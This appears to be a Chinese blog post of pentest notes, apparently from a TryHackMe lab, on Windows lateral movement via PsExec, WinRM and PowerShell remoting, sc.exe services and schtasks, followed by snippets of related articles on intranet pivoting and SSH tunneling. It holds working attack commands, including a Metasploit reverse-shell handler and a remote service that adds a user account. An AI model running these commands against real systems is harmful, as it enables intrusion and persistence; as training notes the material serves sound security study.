内网windows横向移动及ssh建立端口转发

最新推荐文章于 2025-05-18 17:11:16 发布
原创 最新推荐文章于 2025-05-18 17:11:16 发布
· 270 阅读 · 2 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

内网windows横向移动

横向移动与旋转

远程生成进程

# PSexec

## 条件
端口:445/TCP(smb)
所需的组成员身份:管理员
## 下载位置
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
## 使用
psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

# WinRM
## 条件
端口:5985/TCP (WinRM HTTP) 或 5986/TCP (WinRM HTTPS)
所需的组成员身份:远程管理用户
## 使用
winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

# powershell替代WinRM
我们可以从 Powershell 实现相同的目的,但要传递不同的凭据,我们需要创建一个 PSCredential 对象:

$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
获得 PSCredential 对象后,可以使用 Enter-PSSession cmdlet 创建交互式会话:

Enter-PSSession -Computername TARGET -Credential $credential
Powershell 还包括 Invoke-Command cmdlet,它通过 WinRM 远程运行 ScriptBlocks。凭据也必须通过 PSCredential 对象传递:

Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}

# ps
msf快捷使用
msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST lateralmovement; set LPORT 4444;exploit"

远程生成服务

# 使用 sc 创建服务
## 条件
端口:
  135/TCP、49152-65535/TCP (DCE/RPC)
  445/TCP(基于 SMB 命名管道的 RPC)445/TCP (RPC over SMB Named Pipes)
  139/TCP(基于 SMB 命名管道的 RPC)139/TCP (RPC over SMB Named Pipes)
所需的组成员身份:管理员
## 使用
### 创建新用户
sc.exe \\TARGET create THMservice binPath= "net user munra Pass123 /add" start= auto
sc.exe \\TARGET start THMservice
### 停止和删除服务
sc.exe \\TARGET stop THMservice
sc.exe \\TARGET delete THMservice

远程创建计划任务

# schtasks
## 使用
### 创建计划任务
schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00 
schtasks /s TARGET /run /TN "THMtask1"
### 删除计划任务
schtasks /S TARGET /TN "THMtask1"
最低0.47元/天 解锁文章
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2913
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
内网渗透-Windows内网渗透
lza20001103的博客
08-15 2564
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
工作组下的横向移动-完全初学者指南
Mccc_li的博客
11-14 1940
文章目录一.测试环境二.横向手法1.系统漏洞类(1).ms17-0102.凭据类(1).使用IPC$进行横向移动1)前提条件:2)攻击手法: 一.测试环境 win7(192.168.100.132)->winserver2016(192.168.100.136) 注意:所有的手法均在没有开启任何防护软件的情况下进行的! 二.横向手法 1.系统漏洞类 (1).ms17-010 2.凭据类 (1).使用IPC$进行横向移动 1)前提条件: 1.对方主机开启admin$和c$等默认共享,通过ipc$连接可以
Windows下配置SSH实现免密访问和远程端口转发
向往的是:佛祖堂前的鱼,静静听禅。
03-16 1万+
最近想要配置自家的电脑用作服务器,方便自己远程访问。由于没有静态IP,最开始想使用DDNS,从花生壳注册了一个域名,然后在路由配置端口转发,配置完成后,发现家里网络是光猫拨号的,路由器自动获取ip,转发的依然是内网ip,局域网可以访问,但是外网仍然访问不了,后面改成路由器拨号,依然没有公网ip。后面就想着通过一个公网上的服务器做跳板,网上找了一圈,决定使用ssh技术进行转发连接,本路记录ssh实现过程中的一些问题。window下有自动OpenSSH工具可以实现ssh连接管理。
windows使用dd.exe的原理_横向移动SCshell使用Service Manager进行无文件横向移动
weixin_30399511的博客
01-17 497
1.简单介绍SCShell是无文件横向移动工具,它依赖ChangeServiceConfigA来运行命令。该工具的优点在于它不会针对SMB执行身份验证。一切都通过DCERPC执行。无需创建服务,而只需通过ChangeServiceConfigAAPI 远程打开服务并修改二进制路径名即可(所以要事先知道目标上的服务名称)。支持py和exe两种文件类型。该实用程序可以在不注册服务或创建服务的...
使用 SSH 实现端口转发
weixin_47420447的博客
11-21 877
在这篇教程中,我们将介绍如何使用 SSH 命令在 Windows 的命令行(CMD)中实现端口转发端口转发可以让你通过本地端口访问远程服务器上的服务。
内网渗透-内网环境下的横向移动总结
lza20001103的博客
04-14 2576
内网环境下的横向移动总结
渗透测试核心技术:内网渗透与横向移动
最新发布
2402_86373248的博客
05-18 706
内网渗透是红队行动的关键阶段,攻击者通过突破边界进入内网后,需快速定位域控、横向移动并维持权限。本节从内网环境搭建、信息收集、横向移动技巧到权限维持工具,系统讲解如何在内网中隐蔽行动并扩大战果。
内网隧道代理技术_正向代理隧道
2401_84301227的博客
04-29 788
Web 服务器开启了80端口,3389端口不允许出网,可以通过lcx来将web服务器的3389端口转发到允许出网的53端口,这个时候我们再在vps上启用lcx监听53端口的流量并转发到1111端口,最后直接连接vps的的1111端口,就相当于访问web服务器的3389端口(这里的web服务器是可以在外网访问的)攻击者往往利用端口转发来进入内网对某个特定的服务进行攻击,或者是为了绕过本地防火墙的策略(比如:3389端口不出网,我们可以将其转发至出网的53端口
简单的内网横向移动
m0_74326506的博客
07-23 1612
内网中,通过网站漏洞打进一台机器,进行存货扫描,扫到不同网段的机器,然后经过代理打进不同网段的机器,这种叫纵向移动,如果扫到同网段的机器,而且这台机器除了正常端口开放外,没有安装其他任何服务,这可以经过横向移动,打进这台同网段的机器。sc命令可以用来注册删除查询系统服务,如果创建一个服务与木马绑定,则可以实现上线,但是一会就掉线,因为要和服务管理器进行通信,若是异常,明显这个创建的服务并不是正常的服务,所以服务管理器则会终止服务。创建成功,成功上线,删掉计划任务后,msf依旧不会掉线。
内网安全横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全
今天是几号的博客
04-07 1377
Exchange,LLMNR投毒,NTLM-Relay,Kerberos_TGS,GPO&DACL,域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。strict_chain:如果下方设置了多个节点,必须都测试正确才可以使用。dynamic_chain:下方代理节点有一条测试正确也可以使用。172.16.250.30 8080开放 jenkins服务。成功解密后密码为:)uDvra{4UL^;172.16.250.30 8080开放。172.16.250.10 80开放。
内网安全横向移动入门实验
ailx10
06-01 265
说起横向移动,比较偏向渗透测试实战,自然让人想到了SMB横向扩散,SSH横向扩散,RDP横向扩散,在企业安全中,这几个事件经常碰到,并且大多数情况下,都能判定主机中毒了。做为补充的一个安全事件是端口扫描,这样可以构成攻击链条,也就是安全分析运维人员中的杀伤链,在2020年的某个CERT实验局点中,凭借对横向移动端口扫描事件的研判,提交失陷主机,取得了友商第二的好成绩。在后来的ATT&CK...
mac删除ssh key_好用的mac终端命令仿真工具
weixin_39985820的博客
10-28 419
好用的mac终端命令仿真工具是哪个?zoc7 for Mac是应用在Mac上的一款SSH终端命令工具客户端,让您使用安全Shell(SSH), telnet(rfc854),RS232 /串行和许多其他通信方式访问基于字符的主机 ,也可以替代ProComm或者像Attachmate,Ericomm PowerTerm等软件,macdown分享zoc7 mac和谐版下载,需要的朋友,一定不要错过喽。...
windowsssh隧道内网映射
iteye_6697的博客
05-18 1599
     需求:公司服务全在内网,外网无法访问,周末不想去公司,想要在宿舍测试程序只得将公司内网映射到外网。 要求:1、一台放在公司的能上外网的电脑;2、具有公网ip的服务器   因为我的具有公网ip的服务器的windows的,没有ssh服务器,故自己安装了openssh,一路next      openssh的特性: Windows NT Service Support ...
SSH端口转发:本地转发Local Forward和远程转发Remote Forward
xyyangkun的专栏
11-30 4万+
http://zhumeng8337797.blog.163.com/blog/static/100768914201172125444948/ 实战 SSH 端口转发 https://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/ SSH端口转发:本地转发Local Forward和远程转发Remote For
横向移动的思路与实现
热门推荐
Shanfenglan's blog
08-28 10万+
前言 当拿到某域内的一台机器后,需要进一步的扩大战果,这时候就需要进行横向移动横向移动这部分的技术的都是基于信息收集的结果才能实现,信息收集很重要,切记。 推荐几种实现方式: 利用现有exp来对操作系统进行攻击,例如ms17010,ms08067等。 利用密码爆破ssh或者对smb服务进行爆破,可利用impacket工具实现。 利用服务端应用的rce漏洞,如tomcat等中间件漏洞。 制作黄金票据进行横向移动,可利用impacket与mimikatz工具实现。 利用windows的自带命令远控对方主机。
tryhackme之渗透测试基础案例之横向移动内网渗透Wreath-2 pivoting
qq_43200143的博客
08-15 885
文章目录2.pivoting横移的第一步是收集信息下面会用两种工具ProxychainsFoxyProxySSH 隧道 / 端口转发正向连接反弹连接sshuttle 2.pivoting 通过一台机器,进而攻击内网其他机器(公网无法访问到) metasploit等工具可以很容易做到, 手动: 1.隧道/代理 可以逃避简单的IDS的检测 2.端口转发 各有优缺吧,具体要看环境。先进一步探测一下看看再说 从这一步开始绘制拓扑图 如果获取了多个入口,Linux比较好横向移动 metasploit有个命令可以直接
ssh端口转发
studywinwin的博客
02-17 1055
192.168.43.17 yum install telnet-server -y systemctl start telnet.socket iptables -A INPUT -s 192.168.43.6 -j REJECT useradd zs && echo zs |passwd --stdin zs 192.168.43.7 yum install telnet...
windows下搭建SSH隧道内网映射
weixin_33759269的博客
03-06 4310
2019独角兽企业重金招聘Python工程师标准>>> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值